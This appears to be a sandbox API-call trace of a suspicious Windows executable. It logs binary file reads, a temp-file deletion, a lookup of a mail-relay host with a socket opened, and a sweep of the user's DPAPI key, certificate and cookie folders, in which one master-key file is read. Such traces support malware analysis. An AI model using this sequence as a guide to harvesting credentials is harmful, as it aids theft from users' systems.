Buffer => \xec4\xde\xab\xc0\xb8DKW$DW\xb9,<M\xe9\xff\xff\xff\xff\x03VF\xbf\xe8QdB\xce\x9f\x9fG\xb1\xbe|EQ\xed5\x11\x07:\x194=\x82\x10\x17\xff\xe1#\x17\xff\x8d\xde\xfa\xb74JK\x18\x19\xeb\x1d\xb3\x9e\xed[\x11 \xf6\x1d\x9e{\xdf\xe2\x17\xf8D#\x19\xaaN
_\x10\xbeyf\xe9\x91\xb6\x99Z7\xfa[\xff\x81B\x1f\x18\xf9 \xeeJO\xb5|\xc7\xd1+}\x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[z FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => $8O\xe6\x98\x1d\xaeNu\xe75\xf8\xb7\x7f\x89QI\xb162131'\xba=m\x8a\xf3t\xb1O\xff\xeew\xdf\xd0QRu\xf3\x0bxEVH@\x83 SLC2I\xb7\xbfH\xff\x19\xf5\xd288.
@C"O\xb3\xe5\x18eCQ\xff/\xfd\x06\xc7A'\x80\x8f\x8f\xcdZErF\x19v\x1a\xb7\x11M{\xa5\xfe\xff\xffiQF\x11\xcfdZGB-n\x18Va\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => 0i i\x9c\x16\xa4"&\x04:M\x183\xd78Cu\x18}\x19:$9aok\xa5De,\x95\x84 \xc5\x95h\xb5\xc7\x1e\xe3\x9b\xc0g\x1bKey\x0cOp\xeb\xdc\xa3k1\x0bEj\x0e\x80V[\xbd\x00\x1avue\x0f\x8b\xcc\xdc\xa5\x84\x11)um0\x0cO\xb3\xcd&\xb7?d\xc2\xf8m\xa0\xa2an\x87se0\x8a7\x17k\x8cr\x10\xf6\x07isd\xbd\xf6\ z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \x00\x07\xe0\x00\x00\x0f\xf0\x00\x00\x1f\xf8\x00\x00?\xfc\x00\x00\x7f\xfe\x00\x00\xff\xff\x00\x01\xff\xff\x80\x03\xff\xff\xc0\x07\xff\xff\xe0\x0f\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xc8\xc3\x00\x00(\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,839 | 364 | NtReadFile |
Buffer => f\x94\xea\x9c5\x19\xf5*S\xe1E\x8e\x10\xff\xea\x9c5\xdf\xc8\xb2\xdf\x99\xf7\xe5!\xe6'_.\xef\x9c\xaeHd,\x08\xd5_'w&\xf8'|*\')A\x1b\xe9%\x91\x8c
\x9f\xcc(\xbd1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83\xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8% FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,849 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Internet Explorer\Quick Launch\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:02,849 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0$i\xbb\xd5I\xcd\x01\xa0y0Q\xe0\x91\xcf\x01\xa0y0Q\xe0\x91\xcf\x01\xa0y0Q\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x80Ao\xbb\xd5I\xcd\x010\xe0\x7f\xbf\xd5I\xcd\x010\xe0\x7f\xbf\xd5I\xcd\x010\xe0\x7f\xbf\xd5I\xcd\x01w\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\xa0y0Q\xe0\x91\xcf\x01\x10\x18\xca3\xf2\x91\xcf\x01\x10\x18\xca3\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:02,849 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:02,849 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:02,849 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:02,849 | 364 | NtReadFile |
Buffer => FileHandle => 0x00000188 |
FAILURE | 3221225489 | |
| 07:44:02,879 | 364 | DeleteFileA |
FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp3.tmp |
SUCCESS | 0x00000001 | |
| 07:44:02,929 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Media Player\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:02,929 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\x03]\xb9\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:02,929 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:02,929 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,019 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Protect\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:03,019 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\xf0xY&\xe0\x91\xcf\x01\x18\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00R\x00E\x00D\x00H\x00I\x00S\x00T\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0xY&\xe0\x91\xcf\x01\x80\xd023\xf2\x91\xcf\x01\xe0\x1ca&\xe0\x91\xcf\x01\xe0\x1ca&\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:03,019 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,039 | 364 | gethostbyname |
Name => cluster4a.us.messagelabs.com |
SUCCESS | 0x00172cb0 | |
| 07:44:03,069 | 364 | socket |
type => 1 protocol => 6 af => 2 |
SUCCESS | 0x000001a4 | |
| 07:44:03,099 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Protect\S-1-5-21-1935655697-1606980848-1060284298-1003\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:03,099 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0xY&\xe0\x91\xcf\x01\x80\xd023\xf2\x91\xcf\x01\xe0\x1ca&\xe0\x91\xcf\x01\xe0\x1ca&\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x80\x0e^&\xe0\x91\xcf\x01\x80\x0e^&\xe0\x91\xcf\x01\x80\x0e^&\xe0\x91\xcf\x01\x80\x0e^&\xe0\x91\xcf\x01\x84\x01\x00\x00\x00\x00\x00\x00\x88\x01\x00\x00\x00\x00\x00\x00&\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00E\x00F\x000\x003\x002\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00e\x00f\x000\x003\x002\x005\x00a\x00-\x00f\x000\x003\x007\x00-\x004\x00c\x00b\x00a\x00-\x009\x00e\x007\x00f\x00-\x002\x00e\x007\x00c\x00d\x00 |
SUCCESS | 0x00000000 | |
| 07:44:03,099 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Protect\S-1-5-21-1935655697-1606980848-1060284298-1003\aef0325a-f037-4cba-9e7f-2e7cd08585d8 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b4 |
SUCCESS | 0x00000000 | |
| 07:44:03,099 | 504 | NtReadFile |
Buffer => \x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00e\x00f\x000\x003\x002\x005\x00a\x00-\x00f\x000\x003\x007\x00-\x004\x00c\x00b\x00a\x00-\x009\x00e\x007\x00f\x00-\x002\x00e\x007\x00c\x00d\x000\x008\x005\x008\x005\x00d\x008\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\xbd\xefg2HI\x9a\xbb\xef\xef/wP\xbc\xeb\x98\xa0\x0f\x00\x00 \x80\x00\x00\x03f\x00\x00\xe3\x82
\xcd\xf7\x99\x85\xca\xde\xe1\xe0M \xef`\x05\x10;\x1e>s"\x81)O<\x88uS}\xe7\xfb\xcb*I<\x13_\xad\x01<\x8c\x0eek-\xdak\xce8\xf4\xa8\xfc\xba3\x04\x1c{\x96\x19!\xb6E&C\xaf=\x17\x94\xc4q\xc90\x91z\x94\x17z\x89\x84\xfb\xef\xa2\x1b\x9b\x04u\xc1p\xa5\x0b\x85E?I( FileHandle => 0x000001b4 |
SUCCESS | 0x00000000 | |
| 07:44:03,099 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001b4 |
FAILURE | 3221225489 | |
| 07:44:03,099 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,099 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,099 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,099 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:03,099 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:03,099 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00172918 | |
| 07:44:03,109 | 1308 | OpenServiceW |
ServiceControlManager => 0x00172918 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x001727f8 | |
| 07:44:03,109 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:03,109 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:03,109 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:03,179 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\SystemCertificates\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:03,179 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\x03]\xb9\xd5I\xcd\x01`\xb0M2oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\x03]\xb9\xd5I\xcd\x01`\xb0M2oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00y\x00 |
SUCCESS | 0x00000000 | |
| 07:44:03,179 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,259 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\SystemCertificates\My\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:03,259 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\x03]\xb9\xd5I\xcd\x01`\xb0M2oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\xf7\xddf\xe8\x91\xcf\x01`\xb0M2oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00E\x00R\x00T\x00I\x00F\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00e\x00r\x00t\x00i\x00f\x00i\x00c\x00a\x00t\x00e\x00s\x007\x00h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\xf7\xddf\xe8\x91\xcf\x01`\xb0M2oI\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:03,259 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,339 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\SystemCertificates\My\Certificates\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:03,339 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\xf7\xddf\xe8\x91\xcf\x01`\xb0M2oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:03,339 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,339 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,419 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\SystemCertificates\My\CRLs\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:03,419 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\xf7\xddf\xe8\x91\xcf\x01`\xb0M2oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:03,419 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,419 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,499 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\SystemCertificates\My\CTLs\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:03,499 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01p\xf7\xddf\xe8\x91\xcf\x01`\xb0M2oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:03,499 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,499 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,499 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,499 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,499 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,509 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,590 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Cookies\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:03,590 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01\x00\xee*(\xf2\x91\xcf\x01`m\xa7\x87\xe6\x91\xcf\x01 \x1en\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICp\x00\x00\x00\x00\x00\x00\x00\xf0<i\xb9\xd5I\xcd\x01\xf0<i\xb9\xd5I\xcd\x01\xf0(@\x89X\x94\xcf\x01 \x1en\x89X\x94\xcf\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\x00n\x00d\x00e\x00x\x00.\x00d\x00a\x00t\x00\x88\x00\x00\x00\x00\x00\x00\x000>m(\xe0\x91\xcf\x01\xc0\xd3q(\xe0\x91\xcf\x01\xc0\xd3q(\xe0\x91\xcf\x01\xc0\xd3q(\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
